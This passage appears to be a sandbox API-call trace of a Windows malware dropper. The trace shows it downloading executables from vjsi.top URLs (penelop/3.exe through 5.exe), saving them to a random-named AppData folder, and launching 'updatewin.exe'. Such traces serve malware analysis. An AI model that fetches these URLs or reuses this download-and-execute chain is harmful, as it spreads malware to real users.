lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0118.454] WriteFile (in: hFile=0x698, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0118.454] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0118.455] WriteFile (in: hFile=0x698, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0118.455] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0118.456] WriteFile (in: hFile=0x698, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0118.457] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0118.457] WriteFile (in: hFile=0x698, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0118.457] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0118.500] WriteFile (in: hFile=0x698, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0118.500] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0118.543] WriteFile (in: hFile=0x698, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0118.543] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0118.544] WriteFile (in: hFile=0x698, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0118.545] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0118.546] WriteFile (in: hFile=0x698, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0118.546] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0118.582] WriteFile (in: hFile=0x698, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0118.583] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0118.584] WriteFile (in: hFile=0x698, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0118.584] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0118.584] WriteFile (in: hFile=0x698, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0118.585] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0118.585] WriteFile (in: hFile=0x698, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0118.586] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0118.586] WriteFile (in: hFile=0x698, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0118.586] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0118.600] WriteFile (in: hFile=0x698, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0118.600] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0118.601] WriteFile (in: hFile=0x698, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0118.601] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0118.602] WriteFile (in: hFile=0x698, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0118.602] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2200) returned 1 [0118.603] WriteFile (in: hFile=0x698, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2200, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2200, lpOverlapped=0x0) returned 1 [0118.604] CloseHandle (hObject=0x698) returned 1 [0118.609] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0118.616] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0118.616] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0118.694] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5810 | out: hHeap=0x4970000) returned 1 [0118.694] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f80 | out: hHeap=0x4970000) returned 1 [0118.694] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0118.694] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0118.694] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750c5e8 [0118.694] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x84e) returned 0xdcd2280 [0118.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x750c5e8, cbMultiByte=-1, lpWideCharStr=0xdcd2280, cchWideChar=1063 | out: lpWideCharStr="http://vjsi.top/files/penelop/3.exe") returned 36 [0118.694] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x850) returned 0xdcd2b08 [0118.694] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0118.694] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750c5e8 | out: hHeap=0x4970000) returned 1 [0118.694] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x850) returned 0xdcd2280 [0118.694] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x827) returned 0xdcfba90 [0118.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://vjsi.top/files/penelop/3.exe", cchWideChar=-1, lpMultiByteStr=0xdcfba90, cbMultiByte=2087, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://vjsi.top/files/penelop/3.exe", lpUsedDefaultChar=0x0) returned 36 [0118.694] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd3390 [0118.694] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfba90 | out: hHeap=0x4970000) returned 1 [0118.694] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0118.694] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://vjsi.top/files/penelop/3.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0118.910] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd3390 | out: hHeap=0x4970000) returned 1 [0118.910] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0xdccd6d0, lpdwBufferLength=0xdccd710, lpdwIndex=0x0 | out: lpBuffer=0xdccd6d0*, lpdwBufferLength=0xdccd710*=0x4, lpdwIndex=0x0) returned 1 [0118.910] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0118.911] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0010 [0118.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750c7e0 [0118.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x84e) returned 0xdcd2b08 [0118.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x750c7e0, cbMultiByte=-1, lpWideCharStr=0xdcd2b08, cchWideChar=1063 | out: lpWideCharStr="http://vjsi.top/files/penelop/4.exe") returned 36 [0118.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x850) returned 0xdcd3390 [0118.911] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0118.911] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750c7e0 | out: hHeap=0x4970000) returned 1 [0118.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x850) returned 0xdcd2b08 [0118.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x827) returned 0xdcfba90 [0118.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://vjsi.top/files/penelop/4.exe", cchWideChar=-1, lpMultiByteStr=0xdcfba90, cbMultiByte=2087, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://vjsi.top/files/penelop/4.exe", lpUsedDefaultChar=0x0) returned 36 [0118.911] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0118.911] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfba90 | out: hHeap=0x4970000) returned 1 [0118.911] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0118.911] InternetOpenUrlA (hInternet=0xcc0010, lpszUrl="http://vjsi.top/files/penelop/4.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0018 [0119.137] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0119.137] HttpQueryInfoW (in: hRequest=0xcc0018, dwInfoLevel=0x20000013, lpBuffer=0xdccd6d0, lpdwBufferLength=0xdccd710, lpdwIndex=0x0 | out: lpBuffer=0xdccd6d0*, lpdwBufferLength=0xdccd710*=0x4, lpdwIndex=0x0) returned 1 [0119.138] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd3390 | out: hHeap=0x4970000) returned 1 [0119.138] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc001c [0119.138] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750c850 [0119.138] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x84e) returned 0xdcd3390 [0119.138] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x750c850, cbMultiByte=-1, lpWideCharStr=0xdcd3390, cchWideChar=1063 | out: lpWideCharStr="http://vjsi.top/files/penelop/5.exe") returned 36 [0119.138] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x850) returned 0xdcd2280 [0119.138] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd3390 | out: hHeap=0x4970000) returned 1 [0119.138] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750c850 | out: hHeap=0x4970000) returned 1 [0119.138] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x850) returned 0xdcd3390 [0119.138] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x827) returned 0x7516fe8 [0119.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://vjsi.top/files/penelop/5.exe", cchWideChar=-1, lpMultiByteStr=0x7516fe8, cbMultiByte=2087, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://vjsi.top/files/penelop/5.exe", lpUsedDefaultChar=0x0) returned 36 [0119.138] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0119.138] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0119.138] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd3390 | out: hHeap=0x4970000) returned 1 [0119.138] InternetOpenUrlA (hInternet=0xcc001c, lpszUrl="http://vjsi.top/files/penelop/5.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0024 [0119.373] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0119.373] HttpQueryInfoW (in: hRequest=0xcc0024, dwInfoLevel=0x20000013, lpBuffer=0xdccd6d0, lpdwBufferLength=0xdccd710, lpdwIndex=0x0 | out: lpBuffer=0xdccd6d0*, lpdwBufferLength=0xdccd710*=0x4, lpdwIndex=0x0) returned 1 [0119.373] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750c8f8 [0119.373] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750c8f8 | out: hHeap=0x4970000) returned 1 [0119.374] lstrcpyA (in: lpString1=0x74fb668, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b" [0119.374] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b", pMore="5.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\5.exe") returned 1 [0119.374] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5810 [0119.374] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\5.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\5.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3cc [0119.374] SetFilePointer (in: hFile=0x3cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.374] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.448] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.449] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.493] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.493] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.516] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.516] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.525] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.526] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.549] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.550] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.575] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.576] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.576] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.577] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.577] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.578] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.584] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.585] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.595] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.595] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.613] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.614] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.632] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.632] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.718] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.718] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.718] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.719] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.719] WriteFile (in: hFile=0x3cc, lpBuffer=0xdccd778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0xdccd6dc, lpOverlapped=0x0 | out: lpBuffer=0xdccd778*, lpNumberOfBytesWritten=0xdccd6dc*=0x2800, lpOverlapped=0x0) returned 1 [0119.720] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0xdccd778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xdccd6d8 | out: lpBuffer=0xdccd778*, lpdwNumberOfBytesRead=0xdccd6d8*=0x2800) returned 1 [0119.720] WriteFile 